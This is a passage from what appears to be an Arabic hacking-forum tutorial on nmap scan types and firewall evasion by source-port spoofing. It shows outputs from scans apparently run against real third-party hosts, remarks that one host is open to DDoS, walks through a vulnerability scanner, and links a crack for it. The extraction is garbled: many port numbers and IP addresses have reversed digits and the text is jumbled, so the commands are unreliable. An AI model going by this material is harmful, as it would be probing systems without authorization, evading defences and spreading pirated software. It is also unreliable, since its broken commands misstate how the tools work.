115 ‫ مع اني شخصیا لم استطع ان‬Windows ‫ و‬nix* ‫ يعمل في اغلب نظم‬: ‫الجواب‬ ‫استخدمه في ويندوز مع اني قمت بتركیب ما‬ winpcap‫يتطلبه من مكتبات‬ ‫كیف اقوم بتركیب البرنامج ؟‬ :‫ اذا كنت رووت‬: ‫الجواب‬ http://download.insecure.org/nmap/dist/nmap­3.55­1.i386.rpmroot@server [/misc]# wget http://download.insecure.org/nmap/dist/nmap­3.55­1.i386.rpm­­21:23:21­­ => `nmap­3.55­1.i386.rpm' Resolving download.insecure.org... done. Connecting to download.insecure.org[66.35.250.210]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 538,625 [application/octet­stream] 100%[======================>] 538,625 427.99K/s ETA 00:00 21:23:23 (427.99 KB/s) ­ `nmap­3.55­1.i386.rpm' saved [538625/538625] root@server [/misc]# rpm ­Uvh nmap­3.55­1.i386.rpm Preparing... ########################################### [100%] 1:nmap ########################################### [100%] root@server [/misc]# 512 :‫ من ھنا‬tgz ‫ فبأمكانك تنزيله‬rpm ‫ اذا كان نظامك ل يقبل‬: ‫ملحوظه‬ http://download.insecure.org/nmap/dist/nmap­3.55.tgz ‫والتركیب كما ھو معروف لديكم جمیعا‬ gunzip nmap­3.55.tgz tar ­xf nmap­3.55.tar cd nmap­3.55 configure/. make make install ‫ماذا بأمكاني ان افعل الن بعد ان قمت بتركیبه ؟‬ :‫ الن سأقوم بشرح البارامیترز للبرنامج كلن على حده مع المثله‬: ‫الجواب‬ ‫ ما على‬range ‫ لشبكة لجھاز ل‬Ping sweeps ‫وھي للقیام بعمل‬1( sP : ‫الشبكه لمعرفة الجھ زه التي تعمل من التي ل تعمل‬ Ping ‫ملحوظه يستخدم‬ :‫مثال‬ root@server [~]# nmap ­sP 218.18.146.* Host 218.18.146.245 appears to be up. Host 218.18.146.247 appears to be up. Host 218.18.146.248 appears to be up. Host 218.18.146.249 appears to be up. Host 218.18.146.251 appears to be up. Host 218.18.146.252 appears to be up. Nmap run completed ­­ 256 IP addresses (6 hosts up) scanned in 93.910 seconds root@server [~]# 513 ‫ في حالة كان الجھاز الذي‬TCP Ping ‫وھي للقیام بعمل سكان بنظام‬2( PT : Block ICMP ‫ يقوم بـ‬firewall ‫ علیه ذو‬scan ‫تريد عمل‬ ‫فبھ ذه الطريقه ستقوم بالتصال مع المنافذ وسیأتیك الرد عبر‬echo request ‫منفذ تحدده انت (( اذا تركت الخیار فارغا فسیقوم‬ ‫ اوتوماتیكیا‬08 ‫باختیار منفذ‬Nmap


:‫مثال‬ root@server [~]# nmap ­PT22 67.19.6.93 (at 2004­07­13 22:17 EDThttp://www.insecure.org/nmap/Starting nmap 3.55 ) Interesting ports on 93.67­19­6.reverse.theplanet.com (67.19.6.93): (The 1654 ports scanned but not shown below are in state: filtered) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 80/tcp open http 110/tcp open pop3 6558/tcp closed xdsxdm Nmap run completed ­­ 1 IP address (1 host up) scanned in 71.348 seconds root@server [~]# 514 ‫ في المثال وبأمكانك اختیار اي منفذ تعتقد‬22 ‫ تم استخدام المنفذ‬: ‫ملحوظه‬ ‫انه مفتوح في السیرفر الذي امامك او اتركه فارغا‬ 80 ‫ باختیار المنفذ الكثر شھره‬nmap ‫لیقوم‬ ‫ حیث يقوم البرنامج بمحاولة التصال‬scan TCP Connect ‫للقیام بعملیة‬3( sT : ‫مع المنافذ فاذا تم التصال اعطاك نتیجه واذا لم يتم‬ ‫لم يعطك النتیجه‬ :‫مثال‬ root@server [~]# nmap ­sT 67.19.6.93 (at 2004­07­13 22:24 EDThttp://www.insecure.org/nmap/Starting nmap 3.55 ) Interesting ports on 93.67­19­6.reverse.theplanet.com (67.19.6.93): (The 1653 ports scanned but not shown below are in state: filtered) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 80/tcp open http 110/tcp open pop3 113/tcp closed auth 6558/tcp closed xdsxdm Nmap run completed ­­ 1 IP address (1 host up) scanned in 86.775 seconds 515 #]~[ root@server ‫ماقدرت افھ مه كثیر الى الن (( اقصد ما قدرت افھم‬4) FTP Bounce Scan : ‫میكانیكیة العمل تبعه )) ولكن اللي عرفته انك تقدر‬ ‫عن طريق يوزر نیم وباسورد يوزر اف تي بي تعمل سكان بالي بي تبعه عن‬ Nmap‫في‬ b- ‫طريق البارامیترز‬ ‫الخاص‬IP ‫بالموقع المراد ال‬Firewall ‫ او ال‬IDS ‫وبذلك سوف يظھر في ال‬ ‫ فیه‬FTP Account ‫بالموقع الذي تحمل ال‬ :‫مثال‬ 39.6.91.76 12:root@server [~]# nmap ­b user:pass@ftp.yourftpaddress.com ) 55.3 (at 2004­07­13 22:48 EDThttp://www.insecure.org/nmap/Starting nmap .Your ftp bounce server doesn't allow privileged ports, skipping them !Your ftp bounce server sucks, it won't let us feed bogus ports #]~[ root@server ‫ بسبب انه السیرفر الذي املك الیوزر نیم‬scan ‫ لم تتم عملیة‬: ‫ملحوظه‬


‫والباسورد له ل يسمح بعملیة بال ‪fake‬والظاھر انه اغلب‪ ‬‬ ‫السیرفرات لم تعد تسمح لني جربت اكثر من ستة ‪ ftp accounts‬ولم تنفع‪ ‬‬ ‫معي ولكن انشاء االله سوف اقوم بشرحھا تفصیلیھا‪ ‬‬ ‫بعد فھمي الكامل لمیكانیكیة عملھ ا واذا فیه احد من الشباب يقدر يشرحھا‪ ‬‬ ‫يالیت واالله من باب التعاون(‪ :-‬‬ ‫‪ 615‬‬ ‫‪5( sS‬وھو عمل سكان من نوع‪ TCP/SYN ‬وھذا النوع يعتبر اكثر خفاء من النوع‪ ‬‬ ‫‪sT‬حیث انه ل يقوم بعمل اتصال كامل مع المنفذ في‪ ‬‬ ‫الجھاز المقابل بل يقوم بارسال‪ SYN ‬وانتظار الرد‪ SYN+ACK ‬ولكن ل يعطي رد‪ ‬‬ ‫للجھاز المراد عمل‪ SCAN ‬علیه ولذلك يسمى ھذا‪ ‬‬ ‫النوع من ال‪scan ‬بأسم‪ Half­Open‬‬ ‫مثال‪ :‬‬ ‫‪root@server [~]# nmap ­sS 67.19.6.93‬‬ ‫)‪ (at 2004­07­13 23:01 EDThttp://www.insecure.org/nmap/Starting nmap 3.55 ‬‬ ‫‪Interesting ports on 93.67­19­6.reverse.theplanet.com (67.19.6.93):‬‬ ‫)‪(The 1654 ports scanned but not shown below are in state: filtered‬‬ ‫‪PORT STATE SERVICE‬‬ ‫‪21/tcp open ftp‬‬ ‫‪22/tcp open ssh‬‬ ‫‪25/tcp open smtp‬‬ ‫‪80/tcp open http‬‬ ‫‪110/tcp open pop3‬‬ ‫‪6558/tcp closed xdsxdm‬‬ ‫‪Nmap run completed ­­ 1 IP address (1 host up) scanned in 72.432 seconds‬‬ ‫‪root@server [~]#‬‬ ‫­‪6( g‬والفائده منه ھو انه اذا كان السیرفر يقوم بمنع اغلب الطرق التي‪ ‬‬ ‫ذكرناھا فان ھ ذا البارامیتر يستخدم مقاله كتبت قبل سنتین‪ ‬‬ ‫‪ 517‬‬ ‫في )) ‪ neworder.box.sk‬وقد شرحھا اخونا ساد جاكال على ثلث محاضرات‪ ‬‬ ‫سابقا ايام اجتماعاتنا في (( ‪ hack4arab#‬والفكره ھو‪ ‬‬ ‫ان نستخدم منفذ يثق فیه السیرفر والفايروول من أي ‪ IP‬مثل ‪ DNS 35‬او ‪ 02‬‬ ‫)) ‪FTP Data Channel‬منفذ ‪ 02‬تثق فیه اغلب‪ ‬‬ ‫السیرفرات لنھا تستخدمه في حالة كان ھناك اتصال مع ‪ FTP‬حي ‪ (( Active‬‬ ‫(( (( ‪mod‬ھنا يقوم برنامج ‪ nmap‬بعمل تزوير‪ ‬‬ ‫للباكیتات وارسالھا او تمريرھ ا اذا صحت التسمیه عبر منفذ ‪ 35‬او ‪ 02‬مع انھا ل‪ ‬‬ ‫تتوجه الیه بل تتوجه الى المنفذ الحقیقي المراد‪ ‬‬ ‫معرفة وجوده ‪ -:‬وتتم عملیة ال ‪ Scan‬بامكانك تزوير الباكتات بھذه الطريقه عبر‪ ‬‬ ‫برنامج ‪ hping‬ويوجد شرح لھا في نفس المقاله المذكور‪ ‬‬ ‫مثال‪ :‬‬ ‫‪39.6.91.76 35 root@server [~]# nmap ­sS ­g‬‬ ‫‪ ) 55.3 (at 2004­07­13 23:07 EDThttp://www.insecure.org/nmap/Starting nmap‬‬ ‫‪:)39.6.91.76( Interesting ports on 93.67­19­6.reverse.theplanet.com‬‬ ‫‪)(The 1654 ports scanned but not shown below are in state: filtered‬‬ ‫‪PORT STATE SERVICE‬‬ ‫‪21/tcp open ftp‬‬ ‫‪22/tcp open ssh‬‬ ‫‪25/tcp open smtp‬‬ ‫‪80/tcp open http‬‬ ‫‪3110/tcp open pop‬‬ ‫‪6558/tcp closed xdsxdm‬‬


‫‪ 815‬‬ ‫‪Nmap run completed ­­ 1 IP address (1 host up) scanned in 71.929 seconds‬‬ ‫‪#]~[ root@server‬‬ ‫‪7) sF‬وھو نوع اخر من ال ‪scan‬ويسمى ‪ FIN Scanning‬وفكرته ھي انك تقوم‪ ‬‬ ‫بارسال باكجات الى المنافذ في الجھاز المقابل فاذا‪ ‬‬ ‫كان البورت مغلق سیقوم الجھاز المقابل بعمل انھاء ‪ rest‬اما اذا كان المنفذ‪ ‬‬ ‫مفتوح فان السیرفر ل يقوم بالرد علیك‪ ‬‬ ‫ولكن في حالة اذا كان السیرفر ‪ Windows‬فأنه يقوم لعملیة النھاء في جمیع‪ ‬‬ ‫الحوال (( مفتوح المنفذ كان او معلق )) وھذا‪ ‬‬ ‫يساعدك في معرفة نوع النظام الذي امامك‪ ‬‬ ‫ملحوظه ‪ : FIN Scanning‬بطيء نوعا ما‪ ‬‬ ‫مثال ‪ :‬على ويندوز ‪ :3002‬‬ ‫‪78.63.64.212 root@server [~]# nmap ­sF‬‬ ‫‪ ) 55.3 (at 2004­07­14 00:19 EDThttp://www.insecure.org/nmap/Starting nmap‬‬ ‫‪All 1024 scanned ports on dial36­87.sbm.net.sa (212.46.36.87) are: closed‬‬ ‫‪Nmap run completed ­­ 1 IP address (1 host up) scanned in 62.379 seconds‬‬ ‫‪#]~[ root@server‬‬ ‫ملحظه ‪ :‬لحظوا انه ما اعطاني اي منفذ مفتوح مع العلم اني متاكد اني‪ ‬‬ ‫قفلت الفايروول وعندي اكثر من منفذ مفتوح وھذا يؤكد‪ ‬‬ ‫الكلم الذي بالعلى عن تحديد النظام من‪ sF :-‬‬ ‫لنرى ‪ Linux‬الن‪ ‬‬ ‫مثال على‪ Linux :‬‬ ‫‪ 915‬‬ ‫‪39.6.91.76 011,32,02,12,22,35,0006,08 root@server [~]# nmap ­sF ­p‬‬ ‫‪) 55.3 (at 2004­07­14 00:30 EDThttp://www.insecure.org/nmap/Starting nmap‬‬ ‫‪:)39.6.91.76( Interesting ports on 93.67­19­6.reverse.theplanet.com‬‬ ‫‪PORT STATE SERVICE‬‬ ‫‪20/tcp open ftp­data‬‬ ‫‪21/tcp open ftp‬‬ ‫‪22/tcp open ssh‬‬ ‫‪23/tcp open telnet‬‬ ‫‪53/tcp open domain‬‬ ‫‪80/tcp open http‬‬ ‫‪3110/tcp open pop‬‬ ‫‪116000/tcp open X‬‬ ‫‪Nmap run completed ­­ 1 IP address (1 host up) scanned in 0.930 seconds‬‬ ‫‪#]~[ root@server‬‬ ‫لحظوا انه اعطانا المنافذ المفتوحه‪ :‬‬ ‫‪8) I‬وھ ذا الخیار يضیف الى برنامج ‪ nmap‬خاصیه كشف الیوزر الذي يشغل‪ ‬‬ ‫خدمه ما لیكن انك قمت بتركیب برنامج ‪ Stone Proxy‬‬ ‫على منفذ ‪ 8556‬في الجھاز الخاص بك ويريد الھاكر ان يعرف كل منفذ من قام‪ ‬‬ ‫بتشغیل الخدمه التي تفتحه فعلیه ان يضیف‪ ‬‬ ‫البارامیتر ‪ I‬الى المر لیعطیه ال ‪ OWNER‬للخدمه‪ ‬‬ ‫ولكن ھ ذا المر لم يعد يستفاد منه كثیرا ھ ذه اليام لنه يستخدم منفذ ‪ 311‬‬ ‫بنوعیه ‪ TCP‬و ‪ UDP‬وھذا المنفذ يسمى‪ auth‬‬ ‫‪Authentication Service‬حیث عن طريقه بامكانك معرفة المعلومات عن‪ ‬‬ ‫الخدمات الموجوده بالجھاز وھذا المنفذ مقفول عادة او‪ ‬‬ ‫‪ 025‬‬ ‫مفلتر من ال‪Firewalls ‬ولذلك ھذه المیزه في‪ nmap ‬قاربت على النتھاء­‪ :‬‬ ‫مثال‪ :‬‬


root@server [~]# nmap ­I ­sT 209.50.240.193 (at 2004­07­14 00:51 EDThttp://www.insecure.org/nmap/Starting nmap 3.55 ) Interesting ports on 209.50.240.193: (The 1644 ports scanned but not shown below are in state: closed) PORT STATE SERVICE OWNER 80/tcp open http root 6558/tcp open xdsxdm nobody 6666/tcp open irc­serv root Nmap run completed ­­ 1 IP address (1 host up) scanned in 1.525 seconds root@server [~]# TCP Scanning sT‫ أل اذا كان نوع السكان‬ident I ‫ ل يعمل امر‬: ‫ملحوظه‬ ‫ ويقوم‬URG ‫ و‬FIN ‫ ولكن يقوم بارسال باكتات من‬sF ‫وھو مشابه تماما لـ‬9 sX ‫بارسال الطلبات الى المنافذ فاذا كان المنفذ مفتوحا‬ ‫ لقطع التصال واذا كان مغلقا فانه يتجاھله‬RST packet ‫قام الجھاز بارسال‬ ‫تطبق علیه نفس ملحوظة نظام ويندوز في التعامل‬ FIN ‫مع‬ 2003 ‫ ويندوز‬: ‫مثال‬ root@server [~]# nmap ­sX 212.46.36.87 (at 2004­07­14 01:02 EDThttp://www.insecure.org/nmap/Starting nmap 3.55 ) 521 All 1660 scanned ports on dial36­87.sbm.net.sa (212.46.36.87) are: closed Nmap run completed ­­ 1 IP address (1 host up) scanned in 84.282 seconds root@server [~]# (( Linux )) :‫مثال‬ root@server [~]# nmap ­sX 209.50.240.193 (at 2004­07­14 01:00 EDThttp://www.insecure.org/nmap/Starting nmap 3.55 ) Interesting ports on 209.50.240.193: (The 1644 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 1/tcp open tcpmux 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 443/tcp open https 465/tcp open smtps 993/tcp open imaps 522 995/tcp open pop3s 3306/tcp open mysql 6558/tcp open xdsxdm 6666/tcp open irc­serv Nmap run completed ­­ 1 IP address (1 host up) scanned in 6.547 seconds root@server [~]# ‫ حیث انه حین يكون المنفذ مفتوحا في‬FIN ‫وھو يقوم بعكس عمل‬01 sN ‫الجھاز المقابل فانه يقوم بتجاھلك اما اذا كان المنفذ‬


‫ لليقاف‬RST Packet ‫المطلوب مغلقا فان الجھاز المطلوب يقوم بارسال‬ Null Scanning ‫ويسمى ھذا النوع من السكان ب‬ ‫ حیث ان ويندوز يقوم دوما بارسال‬sF ‫ و‬sX ‫ويطبق علیه ما يطبع على نظام‬ ‫ في حالة كان المنفذ مفتوح او مغلق‬RST ‫باكت اليقاف‬ :2003 ‫ ويندوز‬: ‫مثال‬ oot@server [~]# nmap ­sN 212.46.36.87 (at 2004­07­14 01:13 EDThttp://www.insecure.org/nmap/Starting nmap 3.55 ) All 1660 scanned ports on dial36­87.sbm.net.sa (212.46.36.87) are: closed Nmap run completed ­­ 1 IP address (1 host up) scanned in 85.590 seconds root@server [~]# : (( Linux )) :‫مثال‬ root@server [~]# nmap ­sN 209.50.240.193 523 ( at 2004­07­14 01:15 EDThttp://www.insecure.org/nmap/Starting nmap 3.55 ) Interesting ports on 209.50.240.193: (The 1644 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 1/tcp open tcpmux 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 443/tcp open https 465/tcp open smtps 993/tcp open imaps 995/tcp open pop3s 3306/tcp open mysql 6558/tcp open xdsxdm 6666/tcp open irc­serv Nmap run completed ­­ 1 IP address (1 host up) scanned in 7.533 seconds root@server [~]# 524 ‫ للمنفذ عبر ارسال‬Remote procedure call RPC ‫وھو يعطیك معلومات‬11 sR ‫اوامر مجھ وله الى المنافذ لمعرفه ما اذا كان يحوي‬ ‫ ام ل‬RPC ‫خدمة‬ 2003 ‫ ويندوز‬1 ‫مثال‬ root@server [~]# nmap ­sR 212.46.36.87 (at 2004­07­14 01:19 EDThttp://www.insecure.org/nmap/Starting nmap 3.55 ) Interesting ports on dial36­87.sbm.net.sa (212.46.36.87): (The 1658 ports scanned but not shown below are in state: closed) PORT STATE SERVICE VERSION 135/tcp open msrpc 1026/tcp open LSA­or­nterm Nmap run completed ­­ 1 IP address (1 host up) scanned in 89.473 seconds root@server [~]# ‫ ولم اجد‬RPC ‫ لم اجد حین كتابة الموضوع اي سیرفر يحوي خدمات‬: ‫ملحوظه‬


‫سیرفر صن حیث اجد فیه خدمة‪ RPCBIND ‬التي تعمل‪ ‬‬ ‫في منفذ‪ TCP 111 ‬او حتى‪ NFS ‬فلقد كتبت الموضوع على عجل ‪ :-‬فأعذروني‪ ‬‬ ‫يا اخوان‪ ‬‬ ‫‪ 525‬‬ ‫‪21 sO‬وھو لمعرفة البروتوكولت التي تعمل على الجھاز المراد القیام بعمل‪ ‬‬ ‫‪Scan‬علیه مثل ھل الفايروول لديه يمنع‪ ICMP ‬او يمنع‪ ‬‬ ‫‪IGMP‬ھل يقوم بفلتره‪ UDP ‬وماشابه من امور يعني ھذا الخیار لیس في‪ ‬‬ ‫البحث عن منفذ بل للبحث عن بروتوكول‪ ‬‬ ‫مثال‪ :‬‬ ‫‪oot@server [~]# nmap ­sO 209.50.240.193‬‬ ‫)‪ (at 2004­07­14 01:19 EDThttp://www.insecure.org/nmap/Starting nmap 3.55 ‬‬ ‫‪Interesting protocols on 209.50.240.193:‬‬ ‫)‪(The 249 protocols scanned but not shown below are in state: closed‬‬ ‫‪PROTOCOL STATE SERVICE‬‬ ‫‪1 open icmp‬‬ ‫‪2 open igmp‬‬ ‫‪4 open ip‬‬ ‫‪6 open tcp‬‬ ‫‪9 open igp‬‬ ‫‪17 open udp‬‬ ‫‪133 open fc‬‬ ‫‪Nmap run completed ­­ 1 IP address (1 host up) scanned in 244.623 seconds‬‬ ‫‪root@server [~]#‬‬ ‫ملحوظه ‪ :‬كما ترون الوضع ھنا خطیر‪ ICMP ‬يعمل بطلقه وبدون اي معارضه او‪ ‬‬ ‫منع او فلتره وھذا يعني ان ھذا الجھاز قابل للھجوم‪ ‬‬ ‫‪ 526‬‬ ‫علیه باي طريقه من طرق ‪ DDoS‬لم اكتب ھذه المعلومه للتخريب بل لمجرد‪ ‬‬ ‫المعلومه والحصول على كامل الفائده من الموضوع‪ ‬‬ ‫‪13) sA‬وھي تعتمد على ‪ ACK packets‬ويسمى ھذا النوع بأسم ‪ ACK‬‬ ‫‪ Scanning‬وعمله بسیط جدا حیث يستطیع ان يضع لك‪ ‬‬ ‫بشكل واضح قوانین الفايروول الذي تتعامل معه حلوه قوانین‪ ‬‬ ‫ما ادري كیف‬ ‫اقول ‪ rules‬بالعربي‪ ‬‬ ‫ويتم ذلك عن طريق ارسال باكتات من نوع ‪ ACK‬الى منفذ ما فاذا رد الجھاز‪ ‬‬ ‫الذي نقوم بعمل سكان علیه ب ‪ ICMP unreachable‬‬ ‫‪packet‬فھ ذا يدل على ان المنفذ مفلتر من قبل الفايروول اما لو اعطاك الرد‪ ‬‬ ‫باليقاف ‪ RST packet‬فھذا يدل على ان المنفذ غیر مفلتر‪ ‬‬ ‫وبھ ذه الطريقه تستطیع معرفه ماذا يقعل الفايروول الموجود بالجھاز الخر وما‪ ‬‬ ‫ھي المنافذ التي ل تمر من خلل الفلتر الخاص به‪ ‬‬ ‫وما ھي المنافذ المفلتره وما ھي المنافذ المقفوله عبره وتستطیع فھم‪ ‬‬ ‫الفايروول بشكل افضل‪ ‬‬ ‫مثال ‪ : 1‬سیرفر ضعیف جدا‪ ‬‬ ‫‪391.042.05.902 root@server [~]# nmap ­sA‬‬ ‫‪ ) 55.3 (at 2004­07­14 01:19 EDThttp://www.insecure.org/nmap/Starting nmap‬‬ ‫‪All 1660 scanned ports on 209.50.240.193 are: UNfiltered‬‬ ‫‪Nmap run completed ­­ 1 IP address (1 host up) scanned in 1.456 seconds‬‬ ‫‪#]~[ root@server‬‬ ‫‪ 725‬‬ ‫ملحظه ‪ :‬كانه الن ماب يقللكم ترى الفايروول مو شغال في الجھاز ھذا كل‪ ‬‬ ‫المنافذ غیر مفلتره­‪ :‬‬ ‫مثال ‪ (( : 2‬سیرفر افضل((‪ ‬‬


:‫كود‬ http://www.xxxx.com/root@server [~]# nmap ­sA (at 2004­07­14 01:19 EDThttp://www.insecure.org/nmap/Starting nmap 3.55 ) Interesting ports on xxxxxxx.xxxx.com (67.19.6.93): (The 1654 ports scanned but not shown below are in state: filtered) PORT STATE SERVICE 21/tcp UNfiltered ftp 22/tcp UNfiltered ssh 25/tcp UNfiltered smtp 80/tcp UNfiltered http 110/tcp UNfiltered pop3 6558/tcp UNfiltered xdsxdm Nmap run completed ­­ 1 IP address (1 host up) scanned in 71.432 seconds root@server [~]# ‫من ھنا علمنا المنافذ التي ل يقوم الفايروول بفلترتھ ا وبدأنا نشكل خريطه‬ :­‫للفايروول ھذا في عقولنا‬ sA‫يقوم بعمل نفس خطوات‬41 sW 528 :‫مثال‬ http://www.xxxxxx.com/root@server [~]# nmap ­sW (at 2004­07­14 01:19 EDThttp://www.insecure.org/nmap/Starting nmap 3.55 ) Interesting ports on xxxxxx.xxxxxx.com (67.19.6.93): (The 1654 ports scanned but not shown below are in state: filtered) PORT STATE SERVICE 21/tcp closed ftp 22/tcp closed ssh 25/tcp closed smtp 80/tcp closed http 110/tcp closed pop3 6558/tcp closed xdsxdm Nmap run completed ­­ 1 IP address (1 host up) scanned in 72.000 seconds root@server [~]# ‫ يقوم‬TCP ‫ ولكنه بدل من ان يبحث في منافذ‬sT ‫وھو مطابق تماما ل‬51 sU ‫ وھذا ھو الفرق الجوھري‬UDP ‫بالبحث في منافذ‬ ‫ مع العلم باني ركبته‬55.3 ‫ في الصدار الجديد‬sU ‫ لم يعمل لدي‬: ‫ملحوظه‬ ‫ ولكن نفس‬root ‫ اجھزه وكلھا بخاصیة‬4 ‫على اكثر من‬ ‫المشكله‬ 529 ‫ وركبت‬55.3 ‫ حذفت الصدار‬sU ‫ل يعمل ول يعطي اي خطأ ولذلك لجلب امثلة‬ :-‫ وفعل اشتغل معاي‬54.3 ‫اصدار قديم وھو‬ ‫ فل تستعجل علیه‬sT ‫ يتأخر اكثر من‬sU ‫ملحوظه اخرى‬ :‫مثال‬ 78.63.64.212 root@server [~]# nmap ­sU ) 55.3 (at 2004­07­14 01:19 CDThttp://www.insecure.org/nmap/Starting nmap :)78.63.64.212( Interesting ports on dial36­87.sbm.net.sa )(The 1476 ports scanned but not shown below are in state: closed PORT STATE SERVICE 9/udp open discard 1434/udp filtered ms­sql­m Nmap run completed ­­ 1 IP address (1 host up) scanned in 94.141 seconds


#]~[ root@server ‫ والن ساتكلم عن بعض‬nmap ‫انتھینا يا اخوان من اشھ ر بارامیترات برنامجنا‬ ‫المور الصغیره الضافیه‬ ‫ھناك بارامیترات دعم اخرى مثل‬1 ‫او‬range ‫وھ ي لتحديد البورتات المراد البحث فیھا عبر وضع اشارة ال‬1) p ‫الفاصله‬ 035 :‫مثال‬ 1.0.0.721 53556­1 nmap ­sS ­p SYN ‫في ھ ذاالمثال انا اقول للن ماب ان يقوم بعمل سكان من نوع نصف اتصال‬ 53556 ‫ الى‬1 ‫ويبحث في رينج البورتات من‬ :‫مثال‬ 1.0.0.721 456,011,311,35 nmap ­sU ­p 011 ‫ و‬311 ‫ و‬35 ‫ عن المنافذ‬UDP ‫انا ھ نا اقول للن ماب ان يبحث في بروتوكول‬ 456 ‫و‬ Ping ‫وھ و لعمل تصفیر للبینج حیث يجعل نظام البحث ل يستخدم ال‬02 P : ‫مثال‬ 1.0.0.721 4201­1 nmap ­sT ­P0 ­p ‫انا ھ نا اقول لن ماب ان يبحث بنظام اتصال كامل بدون بینج وفي رينج بورتات‬ 1­4201 ‫ للنظام لیعطیك ما نوعه‬fingerprinting ‫وھو للقیام بعمل‬3 O :‫مثال‬ http://www.arabiyat.com/root@server [~]# nmap ­O ) 55.3 (at 2004­07­14 01:19 CDThttp://www.insecure.org/nmap/Starting nmap :391.042.05.902 Interesting ports on )(The 1638 ports scanned but not shown below are in state: closed Device type: general purpose Running: Linux 2.4.X|2.5.X 02.5.2 ­ 0.4.2 OS details: Linux Kernel 135 Uptime 12.520 days (since Thu Jul 1 13:23:23 2004) Nmap run completed ­­ 1 IP address (1 host up) scanned in 9.028 seconds root@server [~]# uptime‫لحطوا الكیرنیل وال‬ ‫وانصح به دوما فھو يريك تفاصیل العمل بشكل ادق ولیس نتائج‬4 v Verbose ‫فقط‬ ‫وسترى بنفسك ماذا اقصد‬nmap ‫جربه مع اي امر لل‬ :‫مثال‬ root@server [~]# nmap ­sS ­v 212.46.36.87 ) at 2004­07­14 01:55 CDThttp://www.insecure.org/nmap/Starting nmap 3.45 ( Host dial36­87.sbm.net.sa (212.46.36.87) appears to be up ... good. Initiating SYN Stealth Scan against dial36­87.sbm.net.sa (212.46.36.87) at 01:56 Adding open port 1026/tcp Adding open port 135/tcp The SYN Stealth Scan took 77 seconds to scan 1657 ports. Interesting ports on dial36­87.sbm.net.sa (212.46.36.87): (The 1652 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 135/tcp open msrpc 1026/tcp open LSA­or­nterm


‫‪ 532‬‬ ‫‪1080/tcp filtered socks‬‬ ‫‪1434/tcp filtered ms­sql­m‬‬ ‫‪3128/tcp filtered squid­http‬‬ ‫‪Nmap run completed ­­ 1 IP address (1 host up) scanned in 79.822 seconds‬‬ ‫‪#]~[ root@server‬‬ ‫طبعا يا اخواني بامكانكم عمل امر واحد في ‪ nmap‬يحوي اكثر من بارامیتر‪ ‬‬ ‫حسب ما تريده انت من السیرفر او الجھاز المراد عمل‪ ‬‬ ‫‪Scanning‬علیه وھ ذه امور ما يحتاج اني اقولھا من الساس ولكن للتنويه‪ ‬‬ ‫اعلم ان ھناك بعض البارامیترات التي تركتھا عنوه مثل عمل سكان على‪ ‬‬ ‫مجموعة من العناوين داخل ملف او جعل ال ‪nmap‬يعمل‪ ‬‬ ‫في الباكجراوند ويقوم بتسجیل الخرج الخاص به في ملف ولكن ھذه امور ما‪ ‬‬ ‫اعتقد انه يحتاج اني اقولھا يا اخوان‪ ‬‬ ‫المھم ھ و ما قلناه والباقي حاول تتعلمه بنفسك وانشاء االله اكون وفقت في‪ ‬‬ ‫الشرح واسف على الطاله‪ ‬‬ ‫‪ 335‬‬ ‫شرح برنامج ‪Shadow Security Scanner‬‬ ‫للكاتب‪ TaZ HaCkEr :‬‬ ‫شرح خاصیة فحص المواقع من الثغرات‪ ‬‬ ‫لبرنامج‪ Shadow Security Scanner‬‬ ‫افتح البرنامج‪ ..‬‬ ‫واضغط على‪ Scanner‬‬ ‫‪ 435‬‬ ‫حدد ‪ Complete Scan‬واضغط‪ Next‬‬ ‫اضف تعلیق اذا اردت وا اتركه واضغط ‪ Next‬‬ ‫اضغط على ‪ Add Host‬واكتب اسم الموقع او الي بي‬ ‫واضغط ‪ Add‬‬ ‫بعد كذا ‪ Done‬تم‪ ‬‬ ‫‪ 535‬‬ ‫ابدأ فحص الموقع وستظھر لك النتائج على يسار البرنامج‬ ‫للتحمیل البرنامج الصدار الجديد‪ ‬‬ ‫‪ http://mirror1.safety­lab.com/SSS.exe‬‬ ‫الكراك ‪ :‬ادخل ھنا ‪ http://andr.net /‬‬ ‫‪ 635‬‬ ‫‪537 )(A‬‬ ‫اسم تطلقه مايكروسوفت على مجموعة‪ ‬‬ ‫‪ActiveX‬‬ ‫تقنیاتھا الكائنیة‪ ، object­oriented‬التي تھدف‬ ‫إلى تحقیق إمكانیة إدخال مزايا دينامیكیة إلى‪ ‬‬ ‫صفحات ويب‪ .‬ويفترض‪ ،‬من الناحیة النظرية‪ ‬‬ ‫على القل‪ ،‬أن تقدم ‪ ActiveX‬بدي ً عن لغة‪ ‬‬ ‫ل‪ ‬‬ ‫جافا من شركة صن مايكروسیستمز‪ .‬ل تحظى‬ ‫ی إل بدعم عدد محدود من‪ ‬‬ ‫لغة ‪ ActiveX‬حال ً‬ ‫ا‪ ‬‬ ‫المطورين‪ ،‬بالضافة إلى منتجات مايكروسوفت‬ ‫المرتبطة بإنترنت من ‪ Internet Explorer.‬ولكن‬ ‫ی من‪ ‬‬ ‫مايكروسوفت تعتبر ‪ ActiveX‬جزًء أساس ً‬ ‫ا‪ ‬‬ ‫ا‬ ‫استراتیجیتھا‪ ،‬وتعد بالستمرار في دعمھا‪ ‬‬ ‫وتطويرھا‪ ،‬لتصبح أداة قیاسیة‪ .‬‬


